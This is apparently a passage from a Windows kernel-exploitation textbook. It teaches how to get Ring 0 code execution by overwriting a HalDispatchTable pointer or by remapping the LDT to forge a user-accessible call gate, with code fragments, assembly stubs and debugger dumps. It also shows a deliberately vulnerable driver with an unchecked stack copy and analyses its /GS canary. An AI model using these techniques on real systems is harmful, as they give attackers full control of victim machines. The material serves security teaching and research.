Kernel dispatch tables usually hold function pointers. They are mainly used to add a level of indirection between two or more layers (either within or outside the same kernel component/driver). We can think, for example, of the main System Call Table (KiServiceTable) used to invoke kernel system calls (based on a system call index given by the user-land process), or of the Hardware Abstraction Layer (HAL) dispatch table (HalDispatchTable), which is stored in the Kernel Executive and holds the addresses of a few HAL routines. This section will show how to overwrite the HalDispatchTable to execute code at Ring 0. This technique was originally used by Ruben Santamarta and described in his excellent paper, “Exploiting Common Flaws in Drivers.”5 We chose this technique over the others for a few reasons: it doesn't need a mandatory recovery, it is stable, and at the time of writing it can also be successfully used on the x64 Windows platform.

First, the HalDispatchTable is located in the Kernel Executive and owns a corresponding exported symbol that can be found using the method presented in the “Kernel Information Gathering” section. After gathering its base address we have to find a suitable entry that is called by a low-frequency routine.

Warning

When overwriting a function pointer with a user-land address (for example when the payload is located in user space like in our case) we have to take care that no other processes will ever execute the routine addressed by the overwritten pointer. Since the payload exists only in the current process address space, trying to execute it while in a different process will likely trigger a kernel crash.

The second entry within the HalDispatchTable fits our needs. This entry is used by an undocumented system call (NtQueryIntervalProfile()) that is not frequently used. Internally, this function calls KeQueryIntervalProfile(), which is shown in the next code snippet (taken from the 32-bit version of Windows):

1: kd> u nt!KeQueryIntervalProfile L37

nt!KeQueryIntervalProfile:

809a1af6 8bff mov edi,edi

809a1af8 55 push ebp

809a1af9 8bec mov ebp,esp

[ … ]

809a1b22 50 push eax

809a1b23 6a0c push 0Ch

809a1b25 6a01 push 1

809a1b27 ff157c408980 call dword ptr [nt!HalDispatchTable+0x4] [1]

809a1b2d 85c0 test eax,eax

809a1b2f 7c0b jl 809a1b3c [2]

809a1b31 807df800 cmp byte ptr [ebp-8],0

809a1b35 7405 je 809a1b3c

809a1b37 8b45fc mov eax,dword ptr [ebp-4] [3]

809a1b3a eb02 jmp 809a1b3e

809a1b3c 33c0 xor eax,eax

809a1b3e c9 leave

809a1b3f c20400 ret 4

As we can see from the snippet, the function reaches, at [1], an indirect CALL through the pointer stored at [HalDispatchTable + 4] (the second entry of the HalDispatchTable). What we have to do is simply overwrite this function pointer, replacing it with the address of our payload. We just need to take care of two more things: the calling convention and the return value. Since our payload has to behave like the original function, we have to respect the calling convention used and, last but not least, return a value that the caller expects. Based on the return value, the code can jump at [2] to the final epilogue, which sets the EAX register to zero before returning. Since the other branch, at [3], merely loads a result into EAX and skips the instruction that zeroes it, we can assume that it is safe for our payload to return zero.

What about the calling convention? Let's take a look at the original routine HaliQuerySystemInformation() to discover the calling convention used:

0: kd> dd nt!HalDispatchTable

80894078 00000003 80a79a1e 80a7b9f4 808e7028

80894088 00000000 8081a7a4 808e61d2 808e6a68

[ … ]

0: kd> u 80a79a1e

hal!HaliQuerySystemInformation:

80a79a1e 8bff mov edi,edi

80a79a20 55 push ebp

[…]

80a79aec 5e pop esi

80a79aed 5b pop ebx

80a79aee e80d8efeff call hal!KeFlushWriteBuffer (80a62900)

80a79af3 c9 leave

80a79af4 c21000 ret 10h

This function has a single exit point that returns to the caller with the RET 10H instruction after having already adjusted the local stack frame with the LEAVE instruction. This means that the function has been called using the __stdcall calling convention. With this convention the callee cleans the stack. In this particular case the function cleans 10H (16) bytes from the stack, which correspond to four arguments. We then have to create a function that will wrap our payload. This wrapper will be declared with the same calling convention and the same number of arguments as the original overwritten function:

ULONG_PTR __stdcall

UserShellcodeSIDListPatchUser4Args(DWORD Arg1,

DWORD Arg2,

DWORD Arg3,

DWORD Arg4)

{

UserShellcodeSIDListPatchUser();

return 0;

}

In this way the compiler will generate code that will keep the stack synched.
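The whole hijack can be rehearsed in user space with an ordinary array of function pointers. The model below is only an illustration of the idea: every mock_ name is hypothetical, slot 0 of the array stands in for the non-pointer first entry of the real table, and portable C cannot express __stdcall, so the sketch relies on the wrapper having the same four-argument signature as the routine it replaces.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Four-argument signature matching the RET 10H epilogue (4 x 4 bytes). */
typedef long (*mock_hal_fn)(uint32_t, uint32_t, uint32_t, uint32_t);

int g_payload_ran = 0; /* set by the payload so its effect is observable */

/* Stand-in for the legitimate routine stored in the second table slot. */
long mock_original_entry(uint32_t a, uint32_t b, uint32_t c, uint32_t d)
{
    (void)a; (void)b; (void)c; (void)d;
    return 1;
}

/* Wrapper with the same arity; returns 0, a value the caller tolerates. */
long mock_payload_wrapper(uint32_t a, uint32_t b, uint32_t c, uint32_t d)
{
    (void)a; (void)b; (void)c; (void)d;
    g_payload_ran = 1; /* the real wrapper would invoke the payload here */
    return 0;
}

/* Stand-in for the caller: an indirect call through the second slot. */
long mock_query_interval_profile(mock_hal_fn *table)
{
    assert(table != NULL && table[1] != NULL);
    return table[1](1, 0x0C, 0, 0);
}
```

Replacing table[1] with mock_payload_wrapper and calling mock_query_interval_profile() again runs the payload and hands 0 back to the caller, which is the behavior the real wrapper has to reproduce inside the kernel.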

Note

Sometimes it is not necessary to align the stack using the correct calling convention if the hooked function is called just before the caller returns. If this happens, and the kernel is compiled using the frame pointer (like the 32-bit version of the Windows Server 2003 kernel) the parent will adjust the stack anyway using the LEAVE instruction. In this way the stack will be aligned correctly and no faults will ever be caused by the desynchronized stack pointer.

One-Byte Overwrite Case Study

If we are able to overwrite all four bytes stored in the second entry of the HalDispatchTable, we can easily substitute the actual value with the address of our payload. But what can we do if we are able to overwrite just one byte? If we can call the vulnerable code path multiple times, we can simply overwrite one byte at a time. But what if the vulnerable function can be triggered only once? Then the answer (at least on 32-bit systems) is straightforward: we have to overwrite the MSB (most significant byte). If we know the value that will be written, we can simply ignore the remaining bytes and map the corresponding 16MB user-land address range with a NOP sled before actually calling the payload. Here's an example to clarify the idea: suppose we can overwrite one byte with the value 0x01, and only once. This is the partial dump of the HalDispatchTable:

0: kd> dd nt!HalDispatchTable

80894078 00000003 80a79a1e 80a7b9f4 808e7028

80894088 00000000 8081a7a4 808e61d2 808e6a68

[ … ]

The second entry is 0x80A79A1E. If we overwrite the MSB with the 0x01 value we end up having 0x01A79A1E. Even if we don't know the other three bytes that compose the final address we can simply map the 16MB range 0x01000000–0x02000000 as RWX (read-write-execute), storing there a long series of NOP instructions ending with a final jump to our payload.
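The arithmetic behind this example can be sketched in a few lines of portable C. This is only an illustration of the address computation; the function names are hypothetical and nothing here touches the kernel or maps memory.

```c
#include <assert.h>
#include <stdint.h>

/* Size of the window selected by fixing only the most significant byte. */
#define MSB_WINDOW_SIZE 0x01000000u   /* 16 MB */

/* Value of a 32-bit pointer after its most significant byte is replaced. */
uint32_t overwrite_msb(uint32_t pointer, uint8_t new_msb)
{
    return ((uint32_t)new_msb << 24) | (pointer & 0x00FFFFFFu);
}

/* First address of the 16 MB window that has to be mapped in user land. */
uint32_t sled_base(uint8_t new_msb)
{
    return (uint32_t)new_msb << 24;
}

/* One past the last address of that window. */
uint32_t sled_end(uint8_t new_msb)
{
    /* 0xFF would wrap around 32 bits; it is not a user-land value anyway. */
    assert(new_msb != 0xFFu);
    return sled_base(new_msb) + MSB_WINDOW_SIZE;
}
```

With the values from the dump, overwrite_msb(0x80A79A1E, 0x01) gives 0x01A79A1E, which falls inside the window delimited by sled_base(0x01) and sled_end(0x01), whatever the three low bytes happen to be.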

Overwriting Kernel Control Structures

Function pointers are not the only good targets. We can overwrite any other kernel structure that modifies the user-land-to-kernel interface. One interesting way to deal with user-land-to-kernel interfaces (or gates) is to modify processor-related tables. As we saw in Chapter 3, if we can modify the IDT, the GDT, or the LDT, we can introduce a new “kernel gate.” This section will show how to automatically overwrite the LDT descriptor within the GDT by redirecting the LDT into user land. This approach has been chosen over the others (e.g., direct GDT/LDT modification) because in this scenario we can successfully exploit the arbitrary overwrite vulnerability by patching just one byte with partially controlled or uncontrolled data.

A similar technique has been used for ages by a few rootkits to locate system-wide open file descriptors and to stealthily open a kernel gate, avoiding having to load drivers on demand. As mentioned before, we can exploit a lot of different vectors and the one shown next is just one among many we can choose from. For example, the direct LDT overwrite vector, described recently by Jurczyk M and Coldwind G,6 can also be used.

Leaking the KPROCESS Address

Windows has a lot of undocumented system calls that do nice things. We have met one of them before, while looking for a way to enumerate device drivers’ base addresses: ZwQuerySystemInformation(). This function can also be used to enumerate the kernel address of the KPROCESS structure of the current running process. The function that implements the KPROCESS search is named FindCurrentEPROCESS(). The full code, as usual, can be found on this book's companion Web site, www.attackingthecore.com.

This function first opens a new handle to the current process object using the OpenProcess() API. After having opened a valid handle, it invokes the ZwQuerySystemInformation() API using SystemHandleInformation as the SYSTEM_INFORMATION_CLASS parameter. This call retrieves all the open handles in the system. Every entry is a SYSTEM_HANDLE_INFORMATION_ENTRY, whose layout is shown below:

typedef struct _SYSTEM_HANDLE_INFORMATION_ENTRY

{

ULONG ProcessId;

BYTE ObjectTypeNumber;

BYTE Flags;

SHORT Handle;

PVOID Object;

ULONG GrantedAccess;

} SYSTEM_HANDLE_INFORMATION_ENTRY,

*PSYSTEM_HANDLE_INFORMATION_ENTRY;

The Object field holds the linear address of the dynamically allocated kernel object related to the given handle that is stored in the Handle field. The function looks for an entry that has the ProcessId field equal to the current process ID and the Handle field equal to the just-opened process handle. The final Object field of the located entry is thus the KPROCESS structure address of the current process.
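The search itself is a simple linear scan. The following sketch models it in portable C over an already-retrieved array; the handle_entry type is a stand-in that mirrors the field order of SYSTEM_HANDLE_INFORMATION_ENTRY, and find_object_address() is a hypothetical name, not the code of FindCurrentEPROCESS().

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Portable stand-in for SYSTEM_HANDLE_INFORMATION_ENTRY (same field order). */
typedef struct {
    uint32_t  process_id;
    uint8_t   object_type_number;
    uint8_t   flags;
    uint16_t  handle;
    uintptr_t object;            /* kernel address of the object */
    uint32_t  granted_access;
} handle_entry;

/*
 * Return the kernel object address recorded for (pid, handle),
 * or 0 if no entry matches both fields.
 */
uintptr_t find_object_address(const handle_entry *entries, size_t count,
                              uint32_t pid, uint16_t handle)
{
    assert(entries != NULL || count == 0);

    for (size_t i = 0; i < count; i++) {
        if (entries[i].process_id == pid && entries[i].handle == handle)
            return entries[i].object;
    }
    return 0;
}
```

Matching on both the process ID and the handle value matters, because handle values are only unique within a single process.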

Note

Since the KPROCESS is the first embedded field within the EPROCESS structure, the address of the KPROCESS structure is always equal to the address of the EPROCESS structure as well.

From this point onward we can overwrite an arbitrary element of the KPROCESS (and thus also the EPROCESS) structure. Let's take a look at a few interesting fields we can overwrite within the KPROCESS structure:

0: kd> dt nt!_kprocess 859b6ce0

+0x000 Header : _DISPATCHER_HEADER

+0x010 ProfileListHead : _LIST_ENTRY

+0x018 DirectoryTableBase : [2] 0x3fafe3c0

+0x020 LdtDescriptor : _KGDTENTRY

+0x028 Int21Descriptor : _KIDTENTRY

+0x030 IopmOffset : 0x20ac

+0x032 Iopl : 0 ''

[ … ]

At the beginning of the KPROCESS structure there are a couple of very interesting entries: a KGDTENTRY structure (LdtDescriptor) and a KIDTENTRY structure (Int21Descriptor). The former represents the local process LDT segment descriptor entry. This special system segment entry is stored within the global descriptor table (GDT) during every context switch and describes the location and size of the current local descriptor table (LDT) in memory. The latter represents the interrupt descriptor table (IDT) entry for vector 21h, used mainly by the virtual DOS machine (NTVDM.exe) to run vm86 (virtual 8086 mode) processes. This entry is needed to emulate the original INT 21h software interrupt, which was the entry point to the old DOS system service routines. By overwriting the former entry (the saved LDT segment descriptor that is later copied into the GDT), we can remap the whole LDT into user-land memory. After having gained full access to the LDT we can simply build an inter-privilege call gate to run Ring 0 code. Similarly, by overwriting the INT 21h IDT entry we can build a new trap gate that achieves the same result: running arbitrary code at Ring 0.

Next, we will briefly show how to exploit the former vector to build an arbitrary call gate, remapping the whole LDT into user-land memory. A call gate is a gate descriptor that can be stored within the LDT or the GDT. It provides a way to jump to a different segment located at a different privilege level.

The main function implementing this exploitation vector is called LDTDescOverwrite(). As usual, the highly-commented full code is available within the DVWDExploits package. First, it creates and initializes a new LDT using the undocumented ZwSetInformationProcess() API that has the following prototype:

typedef enum _PROCESS_INFORMATION_CLASS

{

ProcessLdtInformation = 10

} PROCESS_INFORMATION_CLASS;

NTSTATUS __stdcall

ZwSetInformationProcess

(HANDLE ProcessHandle,

PROCESS_INFORMATION_CLASS ProcessInformationClass,

PPROCESS_LDT_INFORMATION ProcessInformation,

ULONG ProcessInformationLength);

The first parameter has to be a valid process handle (acquired via OpenProcess() API). The second parameter is the process information class type: ProcessLdtInformation. The third parameter holds the pointer to a PROCESS_LDT_INFORMATION structure and the fourth parameter is the size of the aforementioned structure. The PROCESS_LDT_INFORMATION has the following structure:

typedef struct _PROCESS_LDT_INFORMATION

{

ULONG Start;

ULONG Length;

LDT_ENTRY LdtEntries[…];

} PROCESS_LDT_INFORMATION, *PPROCESS_LDT_INFORMATION;

The Start field indexes the first available descriptor within the LDT. The LdtEntries array holds an arbitrary number of LDT_ENTRY structures, and the Length is the size of the LdtEntries array. An LDT_ENTRY may identify a system segment (task-gate segment), a segment descriptor (data or code segment descriptor) or a call/task gate. Every LDT entry is 8-bytes wide on 32-bit architectures and 16-bytes wide on x64 architectures.

Note

It is important not to confuse an LDT segment descriptor (a special system segment that can be stored only within the GDT and that identifies the location of the LDT) with all the other segments/gates that can be stored in either the GDT or the LDT (except trap/interrupt gates, which can be stored only in the IDT).

Of course, as we can imagine, the ZwSetInformationProcess() API lets us create a subset of all possible code and data segments, denying every attempt to create a system segment or gate descriptor. After invoking this call the kernel allocates space for the LDT, initializes the LDT entries and installs the LDT segment descriptor into the current processor GDT. Moreover, since every process can have its own LDT the kernel saves the LDT segment descriptor into the KPROCESS kernel structure LdtDescriptor, as described above. After a process context switch the kernel checks if the new process has a different active LDT segment descriptor and installs it in the current processor GDT before passing control back to the process. What we need to do can be summarized in the following steps:

  • Build an assembly wrapper to the payload to be able to return from the call gate (using a FAR RET).

    This step can be accomplished by writing a small assembly stub that saves the actual context, sets the correct kernel segment selector, invokes the actual payload, and returns to the caller restoring the previous context and issuing a far return. The following is an example of code performing it on 32-bit architecture:

    0: kd> u 00407090 L9

    00407090 60 pushad

    00407091 0fa0 push fs

    00407093 66b83000 mov ax,30h

    00407097 8ee0 mov fs,ax

    00407099 b841414141 mov eax,CShellcode

    0040709e ffd0 call eax

    004070a0 0fa1 pop fs

    004070a2 61 popad

    004070a3 cb retf

    The code saves all the general-purpose registers and the FS segment register. Next, it loads the new FS segment selector, which addresses the current KPCR (Kernel Processor Control Region), and invokes the kernel payload. At the end, before exiting, the code restores the FS segment selector and the general-purpose registers and executes a far return to switch back to user land.

  • Build a fake user-land LDT within a page-aligned address.

    This step is straightforward. We just have to map an anonymous writable page-aligned area in memory using the CreateFileMapping()/MapViewOfFile() API pair.

  • Fill the fake user-land LDT with a single call gate (entry 0) with the following characteristics:

    • The DPL must be 3 (accessible from user space)

    • The code segment selector must be the kernel code segment

    • The offset must be the address of our user-land payload

    This step is carried out by the PrepareCallGate32() function, shown next:

    VOID PrepareCallGate32(PCALL_GATE32 pGate, PVOID Payload)

    {

    ULONG_PTR IPayload = (ULONG_PTR)Payload;

    RtlZeroMemory(pGate, sizeof(CALL_GATE32));

    pGate->Fields.OffsetHigh = (IPayload & 0xFFFF0000) >> 16;

    pGate->Fields.OffsetLow = (IPayload & 0x0000FFFF);

    pGate->Fields.Type = 12;

    pGate->Fields.Param = 0;

    pGate->Fields.Present = 1;

    pGate->Fields.SegmentSelector = 1 << 3;

    pGate->Fields.Dpl = 3;

    }

    The code takes two parameters: the pointer to the call gate descriptor (in our case the first LDT_ENTRY of the fake user-land LDT) and a pointer to the payload. The type field identifies the type of segment. Of course the value “12” indicates a call gate descriptor. The Param field of the gate descriptor indicates the number of parameters that have to be copied to the callee stack while invoking the gate. We have to take this value into account since we need to restore the stack properly during the execution of the far return.

  • Locate the LDT descriptor, adding the correct offset to the address of the KPROCESS structure previously leaked by the FindCurrentEPROCESS() function.

  • Trigger the vulnerability to overwrite the LDT descriptor stored within the KPROCESS structure.

    The LdtDescriptor field of the KPROCESS structure is located 0x20 bytes from the beginning of the structure. We need to overwrite the base address stored within the descriptor, which locates the LDT in memory. As with the previous vector, we can overwrite the whole descriptor or just the MSB of the address. If we overwrite just the MSB, we also have to place a fake LDT at the start of every page in the target 16MB range (much as we filled the range with a NOP sled before).

  • Force a process context switch.

    Since the LDT segment descriptor is updated only after a context switch we need to put the process to sleep or reschedule it before attempting to use the gate. It is enough to call an API that puts the process to sleep like SleepEx(). At the next reschedule the kernel will set up the modified version of the LDT segment descriptor remapping the LDT in user land.

  • Trigger the call gate via a FAR CALL.

    To step into the call gate we need to execute a FAR CALL instruction. Again we can write a small assembly stub to do the job. The next snippet shows the code within the FarCall() function that performs the FAR CALL.

    0: kd> u TestJump

    [ … ]

    004023be 9a000000000700 call 0007:00000000

    [ … ]

    As we can see, the code executes a CALL explicitly specifying a segment selector (0x07) and an offset (0x00000000) that is ignored when calling through a call gate but is mandatory for the assembly instruction format. As we have seen in Chapter 3, a segment selector is made up of three elements. The two least significant bits hold the requested privilege level (RPL), the next bit is the table indicator (TI) flag, and the remaining bits are the index of the descriptor within the GDT/LDT. In this case the segment selector has an RPL equal to three, a TI flag equal to one, and a descriptor index equal to zero. As expected, this means that the selector is addressing the LDT (TI=1) and that we are interested in the already-set-up LDT_ENTRY (the first one), which has an index value equal to zero.
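Two of the steps above come down to bit packing: encoding the call gate descriptor and composing the selector used by the FAR CALL. The sketch below does both with explicit shifts, following the x86 descriptor layout, so the resulting values can be checked by hand. The descriptor32 type and both function names are hypothetical; this is not the CALL_GATE32 bit-field structure from the DVWDExploits package.

```c
#include <assert.h>
#include <stdint.h>

/* The two 32-bit halves of an 8-byte x86 descriptor. */
typedef struct {
    uint32_t low;
    uint32_t high;
} descriptor32;

/* Encode a present 32-bit call gate (type 12) that copies no parameters. */
descriptor32 make_call_gate32(uint32_t offset, uint16_t code_selector,
                              unsigned dpl)
{
    descriptor32 gate;

    assert(dpl <= 3);
    gate.low  = ((uint32_t)code_selector << 16)  /* target code segment     */
              | (offset & 0x0000FFFFu);          /* offset bits 15..0       */
    gate.high = (offset & 0xFFFF0000u)           /* offset bits 31..16      */
              | (1u << 15)                       /* Present                 */
              | ((uint32_t)dpl << 13)            /* descriptor privilege    */
              | (12u << 8);                      /* type 12: 32-bit gate    */
    /* Bits 4..0 of the high half (parameter count) are left at zero. */
    return gate;
}

/* Compose a segment selector: index (13 bits), TI (1 bit), RPL (2 bits). */
uint16_t make_selector(unsigned index, unsigned use_ldt, unsigned rpl)
{
    assert(index < 8192 && use_ldt <= 1 && rpl <= 3);
    return (uint16_t)((index << 3) | (use_ldt << 2) | rpl);
}
```

For a payload stub at 0x00407090, a kernel code selector of 0x08 (1 << 3), and DPL 3, the gate encodes as low = 0x00087090 and high = 0x0040EC00. Likewise, make_selector(0, 1, 3) yields 0x0007, the selector seen in the FAR CALL instruction.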

Stack Buffer Overflow

Despite the fact that stack-based buffer overflows are not nearly as common as arbitrary memory overwrites, these types of vulnerabilities still exist. Because the main kernel components Microsoft ships (together with many third-party drivers) are compiled by default with stack canary (/GS - Buffer Security Check) compiler-based protection, the ease of exploiting this type of vulnerability has decreased. Regardless of this protection, however, we will see that it is still possible to exploit stack-based buffer overflows in a number of ways. What follows is an analysis of the current stack canary implementation (on both 32-bit and 64-bit) as well as all of the contexts, along with their respective prerequisites, where this protection can be bypassed. Since a lot of vulnerabilities in these operating systems are directly or indirectly caused by bad user-space parameter validation logic, we have chosen to place the vulnerable dummy code within a function running in process context (IRQL == PASSIVE_LEVEL) that directly manipulates user-space arguments (as many third-party drivers, system call wrappers, etc., do). You can find this function in the StackOverflow.c file.

The following code shows the TriggerOverflow() function, which can be invoked by calling the DEVICEIO_DVWD_STACKOVERFLOW I/O Control code:

#define LOCAL_BUFF 64

NTSTATUS TriggerOverflow(UCHAR *stream, UINT32 len)

{

char buf[LOCAL_BUFF]; [1]

NTSTATUS NtStatus = STATUS_SUCCESS;

__try

{

ProbeForRead(stream, len, TYPE_ALIGNMENT(char)); [2]

RtlCopyMemory(buf, stream, len); [3]

DbgPrint("[-] Copied: %d bytes, first byte: %c ", [4]

len, buf[0]);

}

__except(EXCEPTION_EXECUTE_HANDLER) [5]

{

NtStatus = GetExceptionCode();

DbgPrint("[!!] Exception Triggered: Handler body: Code: %d ",[6]

NtStatus);

}

return NtStatus;

}

This function allocates a local 64-byte buffer on the stack at [1]; the remainder of the body is enclosed within a __try/__except block. As we discussed in the section “User to Kernel/Kernel to User,” the exception block is mandatory, since the kernel accesses user land directly. Within the __try block, at [2], the function checks the user-supplied memory buffer address using the ProbeForRead() function. This function only checks that the address range lies in user land (and is suitably aligned); it does not verify that the buffer is actually mapped or that it stays mapped afterward. At [3], the code invokes the RtlCopyMemory() function (a memcpy()-like function), which copies the content of the user-land buffer (addressed by the stream pointer) to the local kernel stack buffer (buf). The len parameter is taken directly from user land and is not checked. This implies that invoking the DEVICEIO_DVWD_STACKOVERFLOW I/O Control code with a len parameter greater than 64 will trigger a kernel stack buffer overflow.
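To make the missing check concrete, here is a minimal user-mode sketch of the length validation that TriggerOverflow() omits. It uses plain memcpy() rather than any kernel API, and copy_bounded() is a hypothetical helper, not part of the DVWD driver.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define LOCAL_BUFF 64

/*
 * Copy len bytes from src into dst only if they fit in dst_size bytes.
 * Returns 0 on success, -1 if the request would overflow the destination.
 */
int copy_bounded(char *dst, size_t dst_size,
                 const unsigned char *src, size_t len)
{
    assert(dst != NULL && src != NULL);

    if (len > dst_size)
        return -1;          /* the comparison the vulnerable code never makes */

    memcpy(dst, src, len);
    return 0;
}
```

With a LOCAL_BUFF-sized destination, a 128-byte request is rejected while a 64-byte request succeeds. The vulnerable function performs the copy unconditionally, which is exactly what makes the overflow possible.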

Knowing this, we should start to look at what happens when a larger buffer is passed, such as a 128-byte buffer. An excerpt of the WinDbg output from such an attempt follows:

*** Fatal System Error: 0x000000f7

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.

Use !analyze -v to get detailed debugging information.

BugCheck F7, {f67d9d8a, f79a7ec1, 865813e, 0}

Probably caused by : dvwd.sys ( dvwd+14a2 )

As we can see here, the system hangs with a fatal error code—0x000000F7 (247 in decimal), which is a BugCheck code. The Windows kernel issues a BugCheck when it detects a dangerous condition, such as kernel data corruption; when the kernel detects this sort of condition, it can no longer operate safely. When a BugCheck is caused by a detected data corruption, for example, the kernel blocks its execution flow to avoid further damage to the system, thereby hanging the system (hence the famous Blue Screen of Death [BSOD]). The last piece of information that the fault gives up is the faulting driver's name, dvwd.sys, along with the offset of the offending code.

We can get a better view of the problem by invoking the !analyze -v WinDbg extension command. This extension command displays information about the current exception or BugCheck. The following excerpt shows this command's output:

0: kd> !analyze -v

DRIVER_OVERRAN_STACK_BUFFER (f7)

A driver has overrun a stack-based buffer. This overrun could potentially

allow a malicious user to gain control of this machine.

DESCRIPTION

A driver overran a stack-based buffer (or local variable) in a way that would

have overwritten the function's return address and jumped back to an arbitrary

address when the function returned. This is the classic "buffer overrun"

hacking attack and the system has been brought down to prevent a malicious user

from gaining complete control of it.

Do a kb to get a stack backtrace -- the last routine on the stack before the

buffer overrun handlers and bugcheck call is the one that overran its local

variable(s).

Arguments:

Arg1: f67d9d8a, Actual security check cookie from the stack

Arg2: f79a7ec1, Expected security check cookie

Arg3: 0865813e, Complement of the expected security check cookie

Arg4: 00000000, zero

As we can see from the preceding command output, BugCheck 0xF7 corresponds to the DRIVER_OVERRAN_STACK_BUFFER code which, as suggested by its name, is related to the kernel stack corruption that we've triggered. This error confirms the presence of the canary. The command's output gives us more information about the state of the stack canary, such as the actual security cookie value and the expected value; of course, those values don't match, since the canary was corrupted during the overflow.
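The relationship between the BugCheck arguments is easy to verify by hand. The short sketch below, with hypothetical helper names, checks that Arg3 is the bitwise complement of Arg2 and that Arg1 differs from Arg2, using the values from the output above.

```c
#include <assert.h>
#include <stdint.h>

/* Arg3 of BugCheck 0xF7: bitwise complement of the expected cookie (Arg2). */
uint32_t cookie_complement(uint32_t expected_cookie)
{
    return ~expected_cookie;
}

/* Nonzero if the in-stack cookie (Arg1) no longer matches Arg2. */
int cookie_corrupted(uint32_t actual_cookie, uint32_t expected_cookie)
{
    return actual_cookie != expected_cookie;
}
```

Here cookie_complement(0xf79a7ec1) evaluates to 0x0865813e, matching Arg3, and cookie_corrupted(0xf67d9d8a, 0xf79a7ec1) is nonzero.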

As we'll soon see, stack canary protection varies slightly among the different Windows releases. Moreover, the preconditions and techniques that we can use to bypass this protection differ between 32-bit and 64-bit systems. In the rest of this chapter, we will analyze the exploitation of the aforementioned stack buffer overflow from both a 32-bit and a 64-bit perspective, utilizing Windows Server 2003 SP2 as our 32-bit platform and Windows Server 2008 R2 as our 64-bit platform. We'll begin with the 32-bit scenario.

Windows Server 2003 32-bit Scenario

To better understand kernel stack canary behavior, we need to take a deeper look at the code implementing it. The following snippet represents the assembly prologue of the TriggerOverflow() function compiled by the current WDK on a Windows Server 2003 SP2 32-bit system.

Note

At the time of this writing, the WDK version number was 7600.16385.0. A different version of the WDK may generate slightly different code.

dvwd!TriggerOverflow:

f7773120 6a50 push 50h [1]

f7773122 68581177f7 push off dvwd!__safe_se_handler_table+0x8 [2]

f7773127 e8d8cfffff call dvwd!__SEH_prolog4_GS (f7770104)[3]

f777312c 8b7508 mov esi,dword ptr [ebp+8]

f777312f 33db xor ebx,ebx

[ … ]

f7773198 mov dword ptr [ebp-4], 0FFFFFFFEh

f777319f mov eax, ebx

f77731a1 call dvwd!__SEH_epilog4_GS [4]

f77731a6 retn 8 [5]

The prologue of this function simply invokes __SEH_prolog4_GS(), pushing the size of the local frame at [1] and the data address where the safe handler table is stored at [2]. The local frame is then set up by the custom assembly-written function __SEH_prolog4_GS(), called at [3]. This is a special assembly-written tail stub-function that is used as a helper routine to set up both the caller's exception handler block and the stack canary. At the end of the function, before returning (at [5]), the function calls __SEH_epilog4_GS() [4]. This function gets the current in-stack security cookie and invokes the __security_check_cookie() function, which compares the current security cookie with the master security cookie stored in the .data segment of the driver (the one identified by the __security_cookie symbol that was originally used to set up the current cookie on the stack frame during the function prologue by the __SEH_prolog4_GS() function). If this cookie doesn't match the master cookie, the function invokes the __report_gs_failure() function, which in turn calls the KeBugCheckEx() core kernel function, passing the BugCheck code (F7H-DRIVER_OVERRAN_STACK_BUFFER), the actual corrupted cookie, and the master cookie, and then freezing the box with the system error we analyzed previously.

Tip

Despite the fact that the structured exception handling block is set up along with the GS cookie, these two elements are completely different. The __SEH_prolog4_GS() function holds just one of the possible SEH initialization codes; for example, the __SEH_prolog4() function (without the GS extension) is used in frames that contain an exception handling block but that do not implement the stack canary protection mechanism. Moreover, a special prologue also exists to install the stack canary without setting up the SEH exception block (e.g., where the compiler detects that the code needs to be protected by the stack canary but no exception handling code is present in the source).

Figure 6.6 shows the function frame set up by the __SEH_prolog4_GS() function.

Image

Figure 6.6 SEH + GS function frame on Windows Server 2003 (32-bit).

dvwd!__SEH_prolog4_GS:

f7770104 68600177f7 push offset dvwd!_except_handler4 [1]

f7770109 64ff3500000000 push dword ptr fs:[0] [2]

f7770110 8b442410 mov eax,dword ptr [esp+10h]

f7770114 896c2410 mov dword ptr [esp+10h],ebp

f7770118 8d6c2410 lea ebp,[esp+10h]

f777011c 2be0 sub esp,eax [3]

f777011e 53 push ebx

f777011f 56 push esi

f7770120 57 push edi

f7770121 a1902077f7 mov eax,dword ptr [dvwd!__security_cookie] [4]

f7770126 3145fc xor dword ptr [ebp-4],eax [5]

f7770129 33c5 xor eax,ebp [6]

f777012b 8945e4 mov dword ptr [ebp-1Ch],eax [7]

f777012e 50 push eax

f777012f 8965e8 mov dword ptr [ebp-18h],esp [8]

f7770132 ff75f8 push dword ptr [ebp-8]

f7770135 8b45fc mov eax,dword ptr [ebp-4]

f7770138 c745fcfeffffff mov dword ptr [ebp-4],0FFFFFFFEh

f777013f 8945f8 mov dword ptr [ebp-8],eax

f7770142 8d45f0 lea eax,[ebp-10h]

f7770145 64a300000000 mov dword ptr fs:[00000000h],eax [9]

f777014b c3 ret

The exception registration mechanism works pretty much like its user-space counterpart. First, the function creates a new local EXCEPTION_REGISTRATION_RECORD on the current stack, pushing an exception handler and a pointer to the next registration record. An EXCEPTION_REGISTRATION_RECORD is made up of two pointers: the first pointer addresses the next EXCEPTION_REGISTRATION_RECORD in the exception chain, while the second pointer addresses the associated handler function. The exception handler is pushed at [1] (symbol name _except_handler4). Every process, while in kernel mode, has the FS segment selector properly set up to point to the current kernel KPCR. The first field of the KPCR, addressed via FS:[0], holds the pointer to the current (last) EXCEPTION_REGISTRATION_RECORD structure; thus, at [2], the next pointer is taken directly from FS:[0]. After the exception registration record has been set up, the code at [3] allocates the space for the current local frame (based on the second parameter that's been passed). At [4], the function loads the current value of the master security cookie, which is located via the __security_cookie local symbol, into the EAX register. The cookie value is XORed against the safe handler table pointer stored on the stack (at [5]) and against the value of the current EBP (at [6]). Next, the EBP-XORed cookie is saved onto the stack, at [7], together with the current ESP pointer, at [8]. Finally, at [9], the code registers the current EXCEPTION_REGISTRATION_RECORD (placed within the current stack) into the KPCR.
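The cookie handling at [4], [6], and [7], together with the matching check in the epilogue, can be modeled in a few lines. This is a simplified sketch, assuming the epilogue undoes the XOR with EBP before comparing against the master cookie; the function names and the sample values are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Prologue side: the value stored at [ebp-1Ch] is master_cookie XOR ebp. */
uint32_t frame_cookie(uint32_t master_cookie, uint32_t ebp)
{
    return master_cookie ^ ebp;
}

/* Epilogue side: undo the XOR and compare with the master cookie. */
int frame_cookie_ok(uint32_t stored_cookie, uint32_t master_cookie,
                    uint32_t ebp)
{
    return (stored_cookie ^ ebp) == master_cookie;
}
```

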